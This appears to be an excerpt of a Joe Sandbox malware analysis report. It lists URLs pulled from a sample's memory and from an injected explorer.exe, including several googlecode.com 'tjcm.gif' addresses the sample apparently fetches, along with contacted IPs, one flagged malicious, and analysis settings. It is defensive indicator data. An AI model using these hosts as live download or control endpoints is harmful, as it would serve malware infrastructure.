                                                                                          http://tempuri.org/Entity/Id21LRsystem32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://codecmd01.googlecode.com/files/tjcm.gif&explorer.exe, 00000005.00000002.3380482241.000000000130E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://tempuri.org/Entity/Id9Responsesystem32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://tempuri.org/Entity/Id24Responsesystem32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://tempuri.org/Entity/Id1Responsesystem32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedsystem32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://tempuri.org/Entity/Id18LRsystem32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://tempuri.org/Entity/Id14LRsystem32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://tempuri.org/Entity/Id6LRsystem32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://codecmd02.googlecode.com/filesxeient.CBS_cw5n1h2txyewyexplorer.exe, 00000005.00000002.3380482241.0000000001307000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://tempuri.org/Entity/system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://schemas.xmlsoap.org/ws/2004/08/addressingsystem32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://codecmd01.googlecode.com/files/tjcm.gifJexplorer.exe, 00000005.00000002.3380482241.000000000130E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://tempuri.org/Entity/Id10LRsystem32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://tempuri.org/Entity/Id2LRsystem32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://codecmd03.googlecode.com/explorer.exe, 00000005.00000002.3380482241.000000000129A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://tempuri.org/Entity/Id16Responsesystem32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://codecmd01.googlecode.com/files/tjcm.gif7explorer.exe, 00000005.00000002.3380482241.000000000130E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://tempuri.org/Entity/Id5Responsesystem32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://codecmd02.googlecode.com/files/tjcm.gif&explorer.exe, 00000005.00000002.3380482241.000000000130E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnssystem32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://tempuri.org/Entity/Id10Responsesystem32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://tempuri.org/Entity/Id8Responsesystem32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://tempuri.org/Entity/Id22LRsystem32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://codecmd01.googlecode.com/files/tjcm.gifcexplorer.exe, 00000005.00000002.3380482241.000000000130E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://schemas.xmlsoap.org/soap/envelope/system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://codecmd03.googlecode.com/files/tjcm.gif&explorer.exe, 00000005.00000002.3380482241.000000000130E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://tempuri.org/Entity/Id19LRsystem32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  http://tempuri.org/Entity/Id23Responsesystem32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    http://tempuri.org/Entity/Id15LRsystem32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      http://tempuri.org/Entity/Id7LRsystem32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        http://tempuri.org/Entity/Id11LRsystem32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponsesystem32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            http://schemas.xmlsoap.org/ws/2004/08/addressing/faultsystem32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              http://tempuri.org/Entity/Id17Responsesystem32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                http://tempuri.org/Entity/Id20Responsesystem32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  http://tempuri.org/Entity/Id3LRsystem32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    http://tempuri.org/Entity/Id13Responsesystem32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      http://tempuri.org/Entity/Id4Responsesystem32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        http://codecmd02.googlecode.com/files/tjcm.gifjjQeexplorer.exe, 00000005.00000002.3380482241.0000000001284000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          http://codecmd03.googlecode.com/files/tjcm.gifNexplorer.exe, 00000005.00000002.3380482241.000000000130E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/right/possesspropertysystem32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgementsystem32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                http://tempuri.org/Entity/Id23LRsystem32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  http://tempuri.org/Entity/Id7Responsesystem32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    http://codecmd02.googlecode.com/files/tjcm.gifzexplorer.exe, 00000005.00000002.3380482241.000000000131F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymoussystem32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        http://codecmd02.googlecode.com/explorer.exe, 00000005.00000002.3380482241.000000000129A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          http://tempuri.org/xsystem32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            http://tempuri.org/Entity/Id11Responsesystem32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              http://tempuri.org/Entity/Id22Responsesystem32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                http://codecmd03.googlecode.com/files/tjcm.gifgexplorer.exe, 00000005.00000002.3380482241.000000000130E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  http://codecmd03.googlecode.com/files/tjcm.gifhexplorer.exe, 00000005.00000002.3380482241.000000000130E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    http://codecmd01.googlecode.com/files/tjcm.gifmesexplorer.exe, 00000005.00000002.3380482241.000000000130E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      http://codecmd01.googlecode.com/files/tjcm.gif;Rexplorer.exe, 00000005.00000002.3380482241.00000000012C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        http://codecmd03.googlecode.com/files/tjcm.giftexplorer.exe, 00000005.00000002.3380482241.000000000130E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          http://tempuri.org/Entity/Id16LRsystem32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            http://tempuri.org/Entity/Id8LRsystem32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              http://tempuri.org/Entity/Id18Responsesystem32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                http://codecmd03.googlecode.com/files/tjcm.gifyexplorer.exe, 00000005.00000002.3380482241.000000000130E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  http://tempuri.org/Entity/Id12LRsystem32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    http://tempuri.org/Entity/Id4LRsystem32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/rmXsystem32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                        http://tempuri.org/Entity/Id3Responsesystem32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessagesystem32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            		high
                                                                                                                                                                                                                            http://codecmd02.googlecode.com/files/tjcm.gifbs_cw5n1h2txyewyexplorer.exe, 00000005.00000002.3380482241.0000000001307000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              		high
                                                                                                                                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequencesystem32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                		high
                                                                                                                                                                                                                                http://schemas.xmlsoap.org/soap/actor/nextsystem32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                                  http://codecmd03.googlecode.com/files/tjcm.gif-00AA004BA90Bexplorer.exe, 00000005.00000002.3380482241.000000000130E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                                    http://tempuri.org/Entity/Id14Responsesystem32.exe , 00000002.00000002.3378810244.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E13000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, system32.exe , 00000002.00000002.3378810244.0000000002E62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      		high

                                                                                                                                                                                                                                      World Map of Contacted IPs

                                                                                                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                      • 75% < No. of IPs

                                                                                                                                                                                                                                      Public IPs

                                                                                                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                      159.223.34.114
                                                                                                                                                                                                                                      		unknownUnited States
                                                                                                                                                                                                                                      		46118CELANESE-UStrue
                                                                                                                                                                                                                                      173.194.221.82
                                                                                                                                                                                                                                      		googlecode.l.googleusercontent.comUnited States
                                                                                                                                                                                                                                      		15169GOOGLEUSfalse

                                                                                                                                                                                                                                      General Information

                                                                                                                                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                      Analysis ID:1575683
                                                                                                                                                                                                                                      Start date and time:2024-12-16 08:26:20 +01:00
                                                                                                                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                      Overall analysis duration:0h 7m 26s
                                                                                                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                      Report type:full
                                                                                                                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                      Number of analysed new started processes analysed:17
                                                                                                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                                                                                                      Number of injected processes analysed:1
                                                                                                                                                                                                                                      Technologies:
                                                                                                                                                                                                                                      • HCA enabled
                                                                                                                                                                                                                                      • EGA enabled
                                                                                                                                                                                                                                      • AMSI enabled
                                                                                                                                                                                                                                      Analysis Mode:default
                                                                                                                                                                                                                                      Analysis stop reason:Timeout
